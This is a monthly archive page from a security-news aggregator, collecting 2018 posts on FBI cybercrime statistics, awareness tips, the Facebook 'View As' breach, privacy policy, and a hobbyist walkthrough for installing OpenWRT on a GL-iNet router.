Monthly Archives: September 2018

Cyber Safety Begins at Home – Six Top Tips

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.


Information Security

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.

FBI’s Crime Data Explorer: What the Numbers Say about Cybercrime

What do the numbers say about Cybercrime?  Not much.  No one is using them.  

There is a popular quote often mis-attributed to the hero of Total Quality Management, Edward Deming:  "If you can't measure it, you can't manage it."Its one of the first things I think about every year when the FBI releases their annual Crime Statistics Report, as they just did for 2017.   (The "mis-attributed" is because for all the times he has been quoted, Deming actual said almost the exact opposite.  What he actually said, in "The New Economics," was:  "It is wrong to suppose that if you can’t measure it, you can’t manage it – a costly myth.")

Despite being a misquote, I've used it often myself.  There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it.  Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics.  This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases.  Want to test it yourself?  Call your local Police Department and tell them your computer has a virus.  See what happens.

It isn't for lack of law!  Every State in the Union has their own computer crime law, and most of them have a category that would be broadly considered "hacking."  A quick reference to all 50 states computer crime laws is here:  State Computer Crime Laws - and yet with a mandate to report hacking to the Department of Justice, almost nobody is doing it.

You may be familiar with the Uniform Crime Report, which attempts to create a standard for measurement of crime data across the nation.  UCR failed to help us at all in Cybercrime, because it focused almost exclusively on eight major crimes that were reported through the Summary Reporting System (SRS):

murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.

The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer.  Short-cut URL:

To capture other crime types, the Department of Justice has been encouraging the adoption of the NIBRS - the National Incident-Based Reporting System.  This system primarily focuses on  52 crime categories, and gathers statistics on several more.  Most importantly for us, it includes several categories of "Fraud Crimes"

  • 2 / 26A / False Pretenses/Swindle/Confidence Game
  • 41 / 26B / Credit Card/ATM Fraud
  • 46 / 26C / Impersonation
  • 12 / 26D / Welfare Fraud
  • 17 / 26E / Wire Fraud
  • 63 / 26F / Identity Theft
  • 64 / 26G / Hacking/Computer Invasion

Unfortunately, despite being endorsed by most every major law enforcement advocacy group, many states, including my own, are failing to participate.  The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
In the just-released 2017 data, out of the 18,855 law enforcement agencies in the United States, 16,207 of them submitted SRS "old-style" UCR data.  Only 7,073 (42%) submitted NIBRS-style data.

Unfortunately, the situation when it comes to cybercrime is even worse.  For SRS-style reporting, all cybercrimes are lumped under "Fraud".  In 2016, SRS reported 10.6 Million arrests.  Only 128,531 of these were for "Fraud" of which cybercrime would be only a tiny portion.

Of those eight "fraud type" crimes, the 2017 data is not yet available for detailed analysis  (currently most of state data sets, released September 26, 2018, limit the data in each table to only 500 rows.  Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3800 rows of data, you can see how that filter is inadequate for state-wide analysis in fully participating states!

Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes.  In 2016, 6,191 law enforcement agencies submitted NIBRS-style data.  Of those 5,074 included at least some "fraud type" crimes.  Here's how they broke down by fraud offense.  Note, these are not the number of CRIMES committed, these are the number of AGENCIES who submitted at least one of these crimes in 2017:

type - # of agencies - fraud type description
 2 - 4315 agencies -  False Pretenses/Swindle/Confidence Game
41 - 3956 agencies -  Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion

Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016!  When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion".  To explore on your own, visit the NIBRS 2016 Map.  Then under "Crimes Against Property" choose the Fraud type you would like to explore.  This map shows "Hacking/Computer Intrusion."  Where a number shows up instead of a pin, zoom the map to see details for each agency.

Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports
 As an example, Zooming the number in Tennessee, I can now see a red pin for Nashville.  When I hover that pin, it shows me how many crimes in each NIBRS category were reported for 2017, including 107 cases of Wire Fraud, 34 cases of Identity Theft, and only 3 cases of Hacking/Computer Invasion:

Clicking on "Nashville" as an example

I have requested access to the full data set for 2017.  I'll be sure to report here when we have more to share.

Long Term Security Attitudes and Practices Study

What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.

The Ask

We’re launching a long term study of security practitioners to understand how they approach security, please sign up for our Long Term Security Attitudes and Practices Study here:


A few years ago I was in a customer facing role answering questions about security practices of the SaaS company I worked at. My days were filled with answering questions about our security practices and we would give answers that were good and reasonable answers but not always what the other side was expecting. This discrepancies were based on differing risk tolerances, different contexts, varying approaches to security and technology.

This led to many conversations with our executive about changes to our security practices. Often the question would arise: “what’s good enough?” and outside of pointing to ISO27001/2 and HIPAA I didn’t have an answer. I couldn’t tell my executive what would reasonably satisfy our customer’s security expectations beyond pointing to the standards. Clearly though “standards compliance” wasn’t the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices but there was never a consistency of what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).

Since then I’ve moved on from that company (and changed to an internal role) but those questions have raised for me a more fundamental set of questions: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.X or are we driven by something else? Do we construct policies that are risk centric? Are we pragmatists or purists? Are we advisers or problem solvers?

These are questions that have stuck with me for a while and I’ve not found academic papers that answer these questions and so we’re starting a community based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.

Study Details

The study will consists of multiple surveys; once we get going we’ll start inviting you to a new survey every two weeks. Each survey will be a few questions in length and should not take more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. The study doesn’t expect you to participate in every survey although that would be nice; in fact some of the component surveys may not be relevant to you from time to time.

The study will be anonymous; we’ll still collect an email address and track your unique responses but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses which hopefully will allow us to generate insight.

The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.


Everyone is welcome – sign up here to participate:



The post Long Term Security Attitudes and Practices Study appeared first on Liquidmatrix Security Digest.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

National Cyber Security Awareness MonthDon’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day but this month especially, we are linking arms will safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!

National Cyber Security Awareness Month

  1. Become a NCSAM Champion. The National Cyber Security Alliance (NCSAM) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.National Cyber Security Awareness Month
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network as secure as it can be.National Cyber Security Awareness Month
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

Crucial Elements in Law Enforcement against Cybercrime

Technological innovation, globalization, and urbanization have facilitated criminals and terrorists to pose a fresh wave of hazards that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience and efficiency, but also disadvantages, challenges and threats. The purpose of this paper is to explore into crucial elements in combating cybercrime. The paper identified the following crucial elements as special perpetrator-victim relationship, time elements, spatial elements, technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and fast increase in recent four decades. They should be emphasized in fighting against cybercrime. The paper further analyzes the phenomenon of rent-seeking from the exaggeration of insecurity and cybercrime, which can be misinformation in this battle.

Reliance on cryptography of cloud computing in Healthcare Information Management, lessons for Ghana Health Service.

Cloud Computing is considered as the next logical step in emerging technology for prosperous resource outsourcing, information sharing in Physician-Patient relationship and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing for finding treatment to humanity’s major illnesses has called for a pragmatic understanding of its security deterrence techniques. Studies in cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by Healthcare Administrators. Healthcare data leaked outside to unauthorized users tarnishes the image of such individual, healthcare facility and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies to explore it adoptions, utilization and provision of security strategies in this innovation. Much emphasis were placed on network, interfaces, data, virtualization, legal, compliance and governance as key areas of security challenges in cloud computing. Relevant literatures were discussed to highlight their prominent findings. The contributions presented are relevant in providing a practical framework for enhancing security in other disciplines as well.

Challenge of Malware Analysis: Malware obfuscation Techniques

It is a big concern to provide the security to computer system against malware. Every day millions of malware are being created and the worse thing is that new malware is highly sophisticated which are very difficult to detect. Because the malware developers use the various obfuscation techniques to hide the actual code or the behaviour of malware. Thereby, it becomes very hard to analyze the malware for getting the useful information in order to design the malware detection system because of anti-static and anti-dynamic analysis technique (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.

A Dynamic Scheme for Secure Searches over Distributed Massive Datasets in Cloud Environment using Searchable Symmetric Encryption Technique

Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable to perform searching, computation or analysis on the data. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most of the existing SSE schemes have restrictions on the size and the number of index files, to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively larger, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on the encrypted data stored in Amazon EMR cluster. The secure searchable inverted index is created instantly using Hadoop MapReduce framework during the search process, thus significantly eliminate the need to store document-keyword pairs on the server. The scheme allows dynamic update of existing index and document collection. The parallel execution of the pre-processing phase of the present research work enables to reduce processing time at the client. An implementation of our construction has been provided in this paper. Experimental results to validate the efficacy of our scheme is reported.

Mini pwning with GL-iNet AR150

Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi.

Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.

I'm interested in that device for the simple reason that it has a big-endian CPU.

All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.

I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.

The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.

An alternative is the GL-AR150. This is a company who sells commercial WiFi products like the other vendors, but who caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they  essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors of additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.

So this post is about the steps I took to get things working for myself.

The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.

The problem with their Ethernet port is that you have to manually set your IP address. Their address is I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:

# ifconfig eth:1

The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.

I download this using the browser in my Linux VM, then browse to, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.

The device boots back up, this time the default address is going to be, so again I add another virtual interface to my Linux VM with "ifconfig eth:2" in order to communicate with it.

I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.

The problem is OpenWRT's default WiFi settings. It's somehow interfering with accessing the device. I can't see how reading the rules, but I'm obviously missing something, so I just go in and nuke the rules. I just click on the "WAN" segment in the firewall management page and click "remove". I don't care about security, I'm not putting this on the open Internet or letting guests access it.

To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.

While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.

I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.

DHCP assigns this (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:

C:\> ssh root@

...because I'm a Windows user and Windows supports ssh now g*dd***it.

OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended differences and came back together again the latest version. But this older version still goes by the "LEDE" name.

At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.

The way OpenWRT deals with this is called an "overlay", which uses the same technology has Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system, is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.

What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.

This process is described on OpenWRT's web page here:

It works well -- but for systems with more than 4-megs. This is what defeated me before, there's not enough space to add the necessary packages. But with 16-megs on this device there is plenty off space.

The first step is to update the package manager, such like on other Linuxs.

# opkg update

When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flashdrive parts.

[    5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform

Following the instructions in the above link, I then install those components:

# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras

Simply installing these packages will cause it to recognize the USB drive in dmesg:

[   10.748961] scsi 0:0:0:0: Direct-Access     Samsung  Flash Drive FIT  1100 PQ:
0 ANSI: 6
[   10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 G
[   10.766689] sd 0:0:0:0: [sda] Write Protect is off
[   10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[   10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn'
t support DPO or FUA
[   10.788139]  sda: sda1
[   10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk

At this point, I need to format the drive with ext4. The correct way of doing this is to connect to my Linux VM and format it that way. That's because in these storage limited environments, OpenWRT  doesn't have space for such utilities to do this. But with 16-megs that I'm going to overlay soon anyway, I don't care, so I install those utilities.

# opkg install e2fsprogs

Then I do the normal Linux thing to format the drive:

# mkfs.ext4 /dev/sda1

This blows away whatever was already on the drive.

Now we need to copy over the contents of the existing /overlay. We do that with the following:

# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf - 
# umount /mnt

We use tar to copy because, as a backup program, it maintains file permissions and timestamps. So it's better to backup and restore. We don't want to actually create a file, but instead use it in streaming mode. The '-' on one invocation causes it to stream the results to stdout instead of writing a file. the other invocation uses '-' to stream from stdin. Thus, we never create a complete copy of the archive, either in memory or on the disk. We untar files as soon as we tar them up.

At this point we do a blind innovation I really don't understand. I just did it and it works. The link above has some more text on this, and some things you should check afterwards.

# block detect > /etc/config/fstab; \
   sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
   sed -i s#/mnt/sda1#/overlay# /etc/config/fstab; \
   cat /etc/config/fstab;

At  this point, I reboot and relogin. We need to update the package manager again. That's because when we did it the first time, it didn't include packages that could fit in our tiny partition. We update again now with a huge overlay to get a list of all the package.

# opkg update

For example, gcc is something like 50 megabytes, so I wouldn't have fit initially, and now it does. it's the first thing I grab, along with git.

# opkg install gcc make git

Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves:

  • adding line to /etc/passwd
  • adding line to /etc/group
  • using passwd command to change the password for the accountt
  • creating a directory for the user
  • chown the user's directory

My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.

I'm missing a git helper for https, so I use the git protocol instead:

$ git clone git://
$ cd masscan

At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64-mgs of RAM, so it'll run out of space quickly. Each process needs around 20-megabytes of RAM. So I content myself with two threads:

$ make -j 2

That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.

The final linking step fails. That's because this platform uses different libraries than other Linux versions, the musl library instead of glibc you find on the big distros, or uClibc on smaller distros, like those you'd find on the Raspberry Pi. This is excellent -- I found my first bug I need to fix.

In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:


void main(void)
    int x = *(int*)"\1\2\3\4";
    printf("0x%08x\n", x);

It indeed prints the big-endian result:


The numbers would be reversed if this were little-endian like x86.

Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.

Insecure code cited in Facebook hack impacting nearly 50 million users

On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.

According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.

Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.

In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.

Facebook reportedly fixed the vulnerability and informed law enforcement of the breach and is temporarily turning off the "View As" feature while they undergo security checks. Additionally, the company has reset the access tokens to the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year.

CIPL Submits Comments on Draft Indian Data Protection Bill

On September 26, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton Andrews Kurth LLP submitted formal comments to the Indian Ministry of Electronics and Information Technology on the draft Indian Data Protection Bill 2018 (“Draft Bill”).

CIPL’s comments on the Draft Bill focus on several key issues that are of particular importance for any modern-day data protection law, including increased emphasis on accountability and the risk-based approach to data processing, interoperability with other data protection laws globally, the significance of having a variety of legal bases for processing and not overly relying on consent, the need for extensive and flexible data transfer mechanisms, and the importance of maximizing the effectiveness of the data protection authority.

Specifically, the comments address the following key issues:

  • the Draft Bill’s extraterritorial scope;
  • the standard for anonymization;
  • notice requirements;
  • accountability and the risk-based approach;
  • legal bases for processing, including importance of the reasonable purposes ground;
  • sensitive personal data;
  • children’s data;
  • individual rights;
  • data breach notification;
  • Data Protection Impact Assessments;
  • record-keeping requirements and data audits;
  • Data Protection Officers;
  • the adverse effects of a data localization requirement;
  • cross-border transfers;
  • codes of practice; and
  • the timeline for adoption.

These comments were formed as part of CIPL’s ongoing engagement in India. In January 2018, CIPL responded to the Indian Ministry of Electronics and Information Technology’s public consultation on the White Paper of the Committee of Experts on a Data Protection Framework for India.

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

NTIA Seeks Public Comment on Approach to Consumer Privacy with an Eye Toward Building Better Privacy Protections

On September 26, 2018, the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) announced that it is seeking public comments on a proposed approach to advancing consumer privacy. The approach is divided into two parts: (1) a set of desired user-centric privacy outcomes of organizational practices, including transparency, control, reasonable minimization (of data collection, storage length, use and sharing), security, access and correction, risk management and accountability; and (2) a set of high-level goals that describe the outlines of the ecosystem that should be created to provide those protections, including harmonizing the regulatory landscape, balancing legal clarity and the flexibility to innovate, ensuring comprehensive application, employing a risk and outcome-based approach, creating mechanisms for interoperability with international norms and frameworks, incentivizing privacy research, ensuring that the Federal Trade Commission has the resources and authority to enforce, and ensuring scalability.

The NTIA is specifically looking to the public to respond with comments on the following questions:

  • Are there other outcomes or goals that should be included, or outcomes or goals that should be expanded upon as separate items?
  • Are the descriptions for the outcomes and goals clear, or are there are any issues raised by how any of them are described?
  • Are there any risks that accompany the list of outcomes, the list of goals or the general approach taken?
  • Are there any aspects of the approach that could be implemented or enhanced through Executive action or non-regulatory actions, and if so, what actions?
  • Should further explorations be made regarding additional commercial data privacy-related issues, including any recommended focus and desired outcomes?
  • Are there any aspects of the approach that may be achieved by other means, such as through statutory changes?
  • Do any terms used in the approach require more precise definitions, including suggestions for better definitions and additional terms?
  • Do changes need to be made with regard to the FTC’s resources, processes and/or statutory authority?
  • If all or some of the outcomes or goals described in this approach were replicated by other countries, do you believe it would be easier for U.S. companies to provide goods and services in those countries?
  • Are there other ways to achieve U.S. leadership that are not included in the approach?
  • Are there any high-level goals in this approach that would be detrimental to achieving U.S. leadership?

Comments are due by October 26, 2018, and may be submitted by email. Additional information can be found in the Federal Register Notice.

Senate Commerce Committee Holds Hearing on Examining Consumer Privacy Protections

On September 26, 2018, the U.S. Senate Committee on Commerce, Science, and Transportation convened a hearing on Examining Consumer Privacy Protections with representatives of major technology and communications firms to discuss approaches to protecting consumer privacy, how the U.S. might craft a federal privacy law, and companies’ experiences in implementing the EU General Data Protection Regulation (“GDPR”) and the California Consumer Privacy Act (“CCPA”).

After introductory remarks by Senator and Chairman of the Committee John Thune (R-SD) and Senator Bill Nelson (D-FL), representatives from AT&T, Amazon, Google, Twitter, Apple and Charter Communications provided testimony on the importance of protecting consumer privacy, the need for clear rules that still ensure the benefits that flow from the responsible use of data, and key principles that should be included in any federal privacy law. A question and answer session followed, with various senators posing a variety of questions to the witnesses, covering topics such as comparisons to global data privacy regimes, the current and potential future authority of the Federal Trade Commission, online behavioral advertising and political advertising, current privacy tools and issues surrounding children’s data.

Key views expressed by the witnesses from the hearing include:

  • support for the creation of a federal privacy law and a preference for preemption rather than a patchwork of different state privacy laws;
  • agreement that the FTC should be the regulator for a federal privacy law but the authority of the FTC under such a law should be discussed and examined further;
  • concern around a federal privacy law attempting to copy the GDPR or CCPA. A federal privacy law should seek to avoid the difficulties and unintended consequences created by these laws and the U.S. should put its own stamp on what the law should be; and
  • agreement that a federal law should not be unduly burdensome for small and medium sized enterprises.

An archived webcast of the hearing is available on the Senate Commerce Committee’s website.

The hearing marked the first of several as the U.S. debates whether to adopt federal privacy legislation. The next hearing is scheduled for early October where Andrea Jelinek, head of the European Data Protection Board, Alastair MacTaggert, California privacy activist, and representatives from consumer organizations will participate and answer questions on consumer privacy, the GDPR and the CCPA.

Making an Impact with Security Awareness Training: Quick Wins and Sustained Impact

Posted under: Research and Analysis

Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.

So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.

To solidify the concepts, let’s go through a scenario which works through the process step by step. Let’s say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in their phishing simulation over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well crafted drive-by attack which would have worked against the entire senior team.

So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!

Start with Urgency

As mentioned, your company has a well-established security program. So you can hit the ground running, using your existing baseline security data. Next identify the most significant risks and triage immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit you can start to work on training employees on a critical issue right away.

Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.

Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.

It’s a balance between being overly heavy-handed against the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be testing periodically. That’s the continuous part of the approach – it’s not a one-time thing.

Introduce Contextual Training

As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.

